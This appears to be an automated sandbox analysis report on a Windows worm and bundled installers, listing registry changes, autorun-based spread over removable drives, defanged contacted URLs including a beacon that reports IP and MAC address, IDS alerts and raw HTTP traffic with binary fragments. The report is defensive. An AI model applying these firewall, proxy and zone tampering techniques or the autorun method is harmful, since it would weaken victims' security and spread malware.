[HKLM\System\CurrentControlSet\Hardware Profiles\0001\Software\Microsoft\windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Personal" = "%Documents and Settings%\%current user%\My Documents"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd73-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cookies" = "%Documents and Settings%\%current user%\Cookies"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache2"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common AppData" = "%Documents and Settings%\All Users\Application Data"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd75-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"My Pictures" = "%Documents and Settings%\%current user%\My Documents\My Pictures"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CacheLimit" = "65452"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Desktop" = "%Documents and Settings%\All Users\Desktop"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Documents" = "%Documents and Settings%\All Users\Documents"
"CommonVideo" = "%Documents and Settings%\All Users\Documents\My Videos"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CacheLimit" = "65452"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"CommonMusic" = "%Documents and Settings%\All Users\Documents\My Music"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Start Menu" = "%Documents and Settings%\%current user%\Start Menu"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CacheLimit" = "65452"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"CommonPictures" = "%Documents and Settings%\All Users\Documents\My Pictures"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Local AppData" = "%Documents and Settings%\%current user%\Local Settings\Application Data"

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "98 A2 21 9F BB 42 EC CE 27 8A B7 00 A8 66 2A 0B"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache1"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Desktop" = "%Documents and Settings%\%current user%\Desktop"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"MigrateProxy" = "1"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd72-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{b98117e8-75ca-11e2-81b2-000c293708fb}]
"BaseClass" = "Drive"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache3"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Paths" = "4"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"History" = "%Documents and Settings%\%current user%\Local Settings\History"

The Worm modifies IE settings for security zones to map all local web-nodes with no dots which do not refer to any zone to the Intranet Zone:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "1"

The Worm modifies IE settings for security zones to map all web-nodes that bypassing the proxy to the Intranet Zone:

"ProxyBypass" = "1"

Proxy settings are disabled:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"

The Worm modifies IE settings for security zones to map all urls to the Intranet Zone:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName" = "1"

The Worm deletes the following value(s) in system registry:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"AutoConfigURL"
"ProxyServer"
"ProxyOverride"

The process tqomfn_70567.exe:436 makes changes in the system registry.
The Worm creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "B1 11 5B 82 D2 4E 80 26 94 5C 89 24 B0 0E A2 58"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd73-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd72-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common AppData" = "%Documents and Settings%\All Users\Application Data"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{b98117e8-75ca-11e2-81b2-000c293708fb}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd75-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

Adds a rule to the firewall Windows which allows any network activity:

[HKLM\System\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\AuthorizedApplications\List\%Documents and Settings%\%current user%\Local Settings\Temp]
"tqomfn_70567.exe" = "%Documents and Settings%\%current user%\Local Settings\Temp\tqomfn_70567.exe:*:Enabled:百度卫士在线安装程序"

The Worm adds process executable file it works in to the list of trusted Windows Firewall applications:

[HKLM\System\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\DomainProfile\AuthorizedApplications\List\%Documents and Settings%\%current user%\Local Settings\Temp]
"tqomfn_70567.exe" = "%Documents and Settings%\%current user%\Local Settings\Temp\tqomfn_70567.exe:*:Enabled:百度卫士在线安装程序"

The process wrbumfb.exe:536 makes changes in the system registry.
The Worm creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "25 FD 88 3F 30 C8 88 40 48 AF E0 B7 7E A1 CF 3B"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common AppData" = "%Documents and Settings%\All Users\Application Data"

[HKCR\metnsd\clsid]
"SequenceID" = "A0 3D 24 EA E8 49 E5 43 81 18 30 47 05 F0 DC F1"

The process mscorsvw.exe:1912 makes changes in the system registry.
The Worm creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\State]
"AccumulatedWaitIdleTime" = "1320000"

The process 9377chiyue_Y_gzllq.exe:1064 makes changes in the system registry.
The Worm creates and/or sets the following values in system registry:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Programs" = "%Documents and Settings%\%current user%\Start Menu\Programs"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Directory" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path4]
"CacheLimit" = "65452"
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache4"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"SavedLegacySettings" = "3C 00 00 00 16 00 00 00 01 00 00 00 00 00 00 00"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\9377-³àÔ´«Ëµ]
"NoRepair" = "1"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Start Menu" = "%Documents and Settings%\All Users\Start Menu"

"Common Documents" = "%Documents and Settings%\All Users\Documents"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Personal" = "%Documents and Settings%\%current user%\My Documents"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd73-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cookies" = "%Documents and Settings%\%current user%\Cookies"

"Local AppData" = "%Documents and Settings%\%current user%\Local Settings\Application Data"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\9377-³àÔ´«Ëµ]
"NoModify" = "1"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common AppData" = "%Documents and Settings%\All Users\Application Data"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd75-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"CommonMusic" = "%Documents and Settings%\All Users\Documents\My Music"
"Common Desktop" = "%Documents and Settings%\All Users\Desktop"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"

[HKLM\SOFTWARE\9377-³àÔ´«Ëµ]
"(Default)" = "%Documents and Settings%\%current user%\Local Settings\Application Data\9377-³àÔ´«Ëµ"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Desktop" = "%Documents and Settings%\%current user%\Desktop"

[HKLM\System\CurrentControlSet\Hardware Profiles\0001\Software\Microsoft\windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"My Pictures" = "%Documents and Settings%\%current user%\My Documents\My Pictures"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CacheLimit" = "65452"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\9377-³àÔ´«Ëµ]
"UninstallString" = "%Documents and Settings%\%current user%\Local Settings\Application Data\9377-³àÔ´«Ëµ\uninstall.exe"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Start Menu" = "%Documents and Settings%\%current user%\Start Menu"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CacheLimit" = "65452"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"CommonVideo" = "%Documents and Settings%\All Users\Documents\My Videos"
"CommonPictures" = "%Documents and Settings%\All Users\Documents\My Pictures"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache2"

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "4D AB E9 E8 5C E3 E9 C4 B5 70 FA 09 B3 7D 98 8A"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache1"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CacheLimit" = "65452"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"MigrateProxy" = "1"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd72-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{b98117e8-75ca-11e2-81b2-000c293708fb}]
"BaseClass" = "Drive"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache3"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Paths" = "4"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\9377-³àÔ´«Ëµ]
"DisplayName" = "9377-³àÔ´«Ëµ"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"History" = "%Documents and Settings%\%current user%\Local Settings\History"

The Worm modifies IE settings for security zones to map all local web-nodes with no dots which do not refer to any zone to the Intranet Zone:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "1"

The Worm modifies IE settings for security zones to map all web-nodes that bypassing the proxy to the Intranet Zone:

"ProxyBypass" = "1"

Proxy settings are disabled:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"

The Worm modifies IE settings for security zones to map all urls to the Intranet Zone:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName" = "1"

The Worm deletes the following value(s) in system registry:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"AutoConfigURL"
"ProxyServer"
"ProxyOverride"

The process meinvying.exe:2008 makes changes in the system registry.
The Worm creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Directory" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path4]
"CacheLimit" = "65452"
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache4"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"SavedLegacySettings" = "3C 00 00 00 18 00 00 00 01 00 00 00 00 00 00 00"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"

[HKCU\Software\meinvying]
"ctm" = "3D 6A AF EF 83 61 E4 40"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cookies" = "%Documents and Settings%\%current user%\Cookies"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache2"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common AppData" = "%Documents and Settings%\All Users\Application Data"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"

[HKLM\System\CurrentControlSet\Hardware Profiles\0001\Software\Microsoft\windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CacheLimit" = "65452"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CacheLimit" = "65452"

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "B6 0C 70 4C B2 28 DB 8C AD 8B DE BB 88 45 51 F4"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache1"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CacheLimit" = "65452"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"MigrateProxy" = "1"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"History" = "%Documents and Settings%\%current user%\Local Settings\History"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache3"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Paths" = "4"

The Worm modifies IE settings for security zones to map all local web-nodes with no dots which do not refer to any zone to the Intranet Zone:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "1"

The Worm modifies IE settings for security zones to map all web-nodes that bypassing the proxy to the Intranet Zone:

"ProxyBypass" = "1"

Adds a rule to the firewall Windows which allows any network activity:

[HKLM\System\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\AuthorizedApplications\List\%Program Files%\meinvying]
"meinvying.exe" = "%Program Files%\meinvying\meinvying.exe:*:Enabled:ÃÀŮӪ"

Proxy settings are disabled:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"

The Worm modifies IE settings for security zones to map all urls to the Intranet Zone:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName" = "1"

The Worm deletes the following value(s) in system registry:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"AutoConfigURL"
"ProxyServer"
"ProxyOverride"

The process meinvying.exe:1732 makes changes in the system registry.
The Worm creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "7C 29 CA E3 C4 2A 7C 1B A2 DE 14 4B 41 71 DF A3"

Adds a rule to the firewall Windows which allows any network activity:

[HKLM\System\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\AuthorizedApplications\List\%Documents and Settings%\%current user%\Local Settings\Temp\nsdC.tmp]
"meinvying.exe" = "%Documents and Settings%\%current user%\Local Settings\Temp\nsdC.tmp\meinvying.exe:*:Enabled:ÃÀŮӪ"

Dropped PE files

HOSTS file anomalies

No changes have been detected.

Rootkit activity

No anomalies have been detected.

Propagation

A worm can spread via removable drives. It writes its executable and creates "autorun.inf" scripts on all removable drives. The autorun script will execute the Worm's file once a user opens a drive's folder in Windows Explorer.

VersionInfo

No information is available.

PE Sections

Dropped from:

Downloaded by:

Similar by SSDeep:

Similar by Lavasoft Polymorphic Checker:

URLs

URL	IP
hxxp://e4.gd01.org/setup/?name=%original file name%.exe	183.61.185.25
hxxp://pxsw.n.shifen.com/
hxxp://baidubrs.dlmix.glb0.lxdns.com/client/dllqq/BDLogicUtils.dll
hxxp://117.21.189.50/dl1sw.baidu.com/client/dllqq/BDLogicUtils.dll?wsiphost=local
hxxp://bcs.jomodns.com/sw-search-shadu/client/dllv4/BDMReport.dll
hxxp://baidubrs.dlmix.glb0.lxdns.com/client1/common/patch/16101830722/BDMNet.dll
hxxp://117.21.189.50/dl1sw.baidu.com/client1/common/patch/16101830722/BDMNet.dll?wsiphost=local
hxxp://117.21.189.57/dl1sw.baidu.com/client1/common/patch/16101830722/BDMNet.dll?wsiphost=local
hxxp://117.21.189.55/dl1sw.baidu.com/client1/common/patch/16101830722/BDMNet.dll?wsiphost=local
hxxp://117.21.189.53/dl1sw.baidu.com/client1/common/patch/16101830722/BDMNet.dll?wsiphost=local
hxxp://117.21.189.56/dl1sw.baidu.com/client1/common/patch/16101830722/BDMNet.dll?wsiphost=local
hxxp://sxsw.n.shifen.com/
hxxp://baidubrs.dlmix.glb0.lxdns.com/client/new_v1196/0409/Baidusd_Setup_1.0.287.272_Sid_10001_Silent_Defense.exe
hxxp://117.21.189.51/dl1sw.baidu.com/client/new_v1196/0409/Baidusd_Setup_1.0.287.272_Sid_10001_Silent_Defense.exe?wsiphost=local
hxxp://117.21.189.55/dl1sw.baidu.com/client/new_v1196/0409/Baidusd_Setup_1.0.287.272_Sid_10001_Silent_Defense.exe?wsiphost=local
hxxp://117.21.189.51/dl1sw.baidu.com/client1/common/patch/16101830722/BDMNet.dll?wsiphost=local
hxxp://iframe.ip138.com/ic.asp	118.144.132.110
hxxp://baidubrs.dlmix.glb0.lxdns.com/client/new_w1154/0403/BaiduAn_Setup_1.0.546.32_Sid_555555_Silent.exe
hxxp://117.21.189.53/dl1sw.baidu.com/client/new_w1154/0403/BaiduAn_Setup_1.0.546.32_Sid_555555_Silent.exe?wsiphost=local
hxxp://117.21.189.50/dl1sw.baidu.com/client/new_w1154/0403/BaiduAn_Setup_1.0.546.32_Sid_555555_Silent.exe?wsiphost=local
hxxp://www.9377.com/api/client_data_receive.php?Name=9377chiyue&Channel=gzllq&Version=1.2.4.1&IP=184.107.38.38&MAC=00-0C-29-7C-CD-1F&Installtime=2014/4/11/2:56:49&ExeName=C:Documents and SettingsadmLocal SettingsTemp9377chiyue_Y_gzllq.exe	183.60.41.253
jp.download.iyuntian.com	123.125.65.154
tk.download.iyuntian.com	123.125.69.209
rc.download.iyuntian.com	123.125.65.153
dlsw.baidu.com	61.155.165.27
dl1sw.baidu.com	117.21.189.102
res.download.iyuntian.com	123.125.65.129
dtrp.download.iyuntian.com	123.125.65.150
d.jinhuasi.org	222.186.60.12
p.x.baidu.com	123.125.65.152
utk.download.iyuntian.com	123.125.65.147
cfg.download.iyuntian.com	123.125.65.132
s.x.baidu.com	180.76.2.46
res2.download.iyuntian.com
qr.download.iyuntian.com
res3.download.iyuntian.com
xiazai.9377.com
sn.download.iyuntian.com

IDS verdicts (Suricata alerts: Emerging Threats ET ruleset)

ET POLICY HTTP Request on Unusual Port Possibly Hostile
ET SHELLCODE Possible TCP x86 JMP to CALL Shellcode Detected
ET POLICY User-Agent (NSIS_Inetc (Mozilla)) - Sometimes used by hostile installers
SURICATA STREAM ESTABLISHED packet out of window
SURICATA STREAM Packet with invalid ack
SURICATA STREAM ESTABLISHED invalid ack

Traffic

GET /dl1sw.baidu.com/client/new_w1154/0403/BaiduAn_Setup_1.0.546.32_Sid_555555_Silent.exe?wsiphost=local HTTP/1.1

Accept: */*

Accept-Language: zh-CN,zh,en-US

Connection: Keep-Alive

Host: 117.21.189.53

Referer: hXXp://dl1sw.baidu.com/

User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)

HTTP/1.0 200 OK

Expires: Sat, 10 May 2014 14:15:15 GMT

Date: Thu, 10 Apr 2014 14:15:15 GMT

Server: nginx

Content-Type: application/octet-stream

Content-Length: 30926976

Last-Modified: Thu, 03 Apr 2014 11:03:48 GMT

Cache-Control: max-age=2592000

Accept-Ranges: bytes

Age: 52235

Via: 1.0 fjqz160:8104 (Cdn Cache Server V2.0), 1.0 jxjj53:25001 (Cdn Cache Server V2.0)

Connection: keep-alive

Content-Disposition: attachment;filename="BaiduAn_Setup_1.0.546.32_Sid_555555_Silent.exe"
[email protected](.P.........................
..!..L.!This program cannot be run in DOS mode....$.......A{.k...8...8
...8.b<8...8.b,8...8...8...8...8...8..%8...8.."8...8Rich...8.......
.PE..L.....GO.................p.......B...9............@..............
.............).....m.;*[email protected]........@$
..I..........0...P....................................................
........................................text....o.......p.............
..... ..`.rdata...*.......,...t..............@[email protected]....~...........
...............@....ndata.......0...........................rsrc....I.
..@$..J..................@[email protected]........)[email protected].
......................................................................
......................................................................
......................................................................
......................................................................
...............................................U....\.}..t .}.F.E.u..H
[email protected][email protected]...
..@..}[email protected]... M..........M........E...FQ.....NU
..M.......M...VT..U........FP..E...............E.P.M...H.@..E..P.E..E.
[email protected]}[email protected].}.j.W.E......E.....
[email protected][email protected][email protected] [email protected].
u.....@._^3.[.....L$...-G...i. @...T.....tUVW.q.3.;5.-G.sD..i. @...D..
S.....t.G.....t...O..t .....u...3....3...F. @..;5.-G.r.[_^...U..QQ
<<< skipped >>>

GET /client1/common/patch/16101830722/BDMNet.dll HTTP/1.1

Accept: */*

Accept-Language: zh-CN,zh,en-US

Connection: Keep-Alive

Host: dl1sw.baidu.com

Range: bytes=163840-

Referer: hXXp://dl1sw.baidu.com/

User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)

GET /client1/common/patch/16101830722/BDMNet.dll HTTP/1.1

Accept: */*

Accept-Language: zh-CN,zh,en-US

Connection: Keep-Alive

Host: dl1sw.baidu.com

Range: bytes=163840-

Referer: hXXp://dl1sw.baidu.com/

User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)

HTTP/1.0 302 Found

Cache-Control: no-cache

Connection: close

Location: hXXp://117.21.189.51/dl1sw.baidu.com/client1/common/patch/16101830722/BDMNet.dll?wsiphost=local

GET /dl1sw.baidu.com/client/new_w1154/0403/BaiduAn_Setup_1.0.546.32_Sid_555555_Silent.exe?wsiphost=local HTTP/1.1

Accept: */*

Accept-Language: zh-CN,zh,en-US

Connection: Keep-Alive

Host: 117.21.189.50

Range: bytes=23199744-

Referer: hXXp://dl1sw.baidu.com/

User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)

HTTP/1.0 206 Partial Content

Expires: Sat, 10 May 2014 14:28:53 GMT

Date: Thu, 10 Apr 2014 14:28:53 GMT

Server: nginx

Content-Type: application/octet-stream

Last-Modified: Thu, 03 Apr 2014 11:03:48 GMT

Cache-Control: max-age=2592000

Accept-Ranges: bytes

Content-Range: bytes 23199744-30926975/30926976

Content-Length: 7727232

Age: 51420

Via: 1.0 fjqz160:8104 (Cdn Cache Server V2.0), 1.0 jxjj50:25001 (Cdn Cache Server V2.0)

Connection: keep-alive

Content-Disposition: attachment;filename="BaiduAn_Setup_1.0.546.32_Sid_555555_Silent.exe"
S.ap.5*.T...i..,.(....4......P..0.j./...oD`.EK.....E.....6.....W..,g.?
.5/wW5x1...yE.J,Y....;.=...R..Y)..0.H.O.>K.&E....M.9.C.9/Q.g..._...
...0."f....w.y..>.*......1..orzfx[...V.....IG.W4mH.M.L.j....7...O.s
...n.......f.;~..nN.S!....Z|...0..!....u.. |)...a..M...c.b.MK.; ..X...
..6.b..D.y.........a..A.Rw.....".. .. .ar.'....#...I........Xp89<..
....q....sb=.qv@b..!......eD.......2....H..P.t.Fx...wvP........u..Gx..
...[;.R.t....4.#..U._o.d.l..$..X..G..e.l|@....Q..:.es}.z1k. :.@..~T.e.
.:.Y.P.....[......m..Q(~....~..a.U......q..N*..Qp..C........g..x....f.
......G..s.....4..s..^|..m[.Fk.M.6........H..P...P....f.;.(....rI3.My.
..s6}..>|.s..?....m....6*[email protected].'......D..e..\..y..$.........4
.5C.r!..8.B..`HZ...|.N..........n.]..V.6.~..a..U.0sWN.$.S"!p..?.H.>
1.v|.......@.\...jxEVKEo.......t.D.......ar...KnU..^.n........><
.Q..'[email protected]......|.........h7R
.':.e`.a..|..M< *].....2.`.....0t.....a.K..d.[B...?_..x..H...8V....
..9 .9.... [..,.q...q.& ..y.nf\X....=.;..m:. .{.....J.q.y.[2:..i..s...
C......W....U..0;....9.R.(H. RA.....Rj0M..L..^..t..3....A....0..u..-.C
.JD.....XE..g;..U.....j.5...W.(U..0.*....[..~..:..5.P.....|d..=...._5\
...J....;...N..|....e.....ZNy[..;....<..r..U.5...&;:i.*q.>}..Tg.
....._~.D...u|..0...h.R..p....u...".V.;......WZ..1*.}.T...nl$.4.9o..O.
'%U..s...,...-...4...:...L`<...V...*....z..sR....YAE.CxSo..[..p@T..
[email protected]...!...d...Z......eZ,JA... ....S........oE>.j....%..Q..x....I;f
....*.d...l..........{....L.R.m.&h.........h.(.....|....2......^..
<<< skipped >>>

GET /client1/common/patch/16101830722/BDMNet.dll HTTP/1.1

Accept: */*

Accept-Language: zh-CN,zh,en-US

Connection: Keep-Alive

Host: dl1sw.baidu.com

Range: bytes=1114112-

Referer: hXXp://dl1sw.baidu.com/

User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)

HTTP/1.0 206 Partial Content

Expires: Sun, 27 Apr 2014 09:18:23 GMT

Date: Fri, 28 Mar 2014 09:18:23 GMT

Server: nginx

Content-Type: application/octet-stream

Last-Modified: Thu, 27 Mar 2014 06:30:30 GMT

Cache-Control: max-age=2592000

Accept-Ranges: bytes

Content-Range: bytes 1114112-1176519/1176520

Content-Length: 62408

Age: 1193231

Via: 1.0 hncd45:8104 (Cdn Cache Server V2.0), 1.0 jxjj52:8888 (Cdn Cache Server V2.0)

Connection: keep-alive

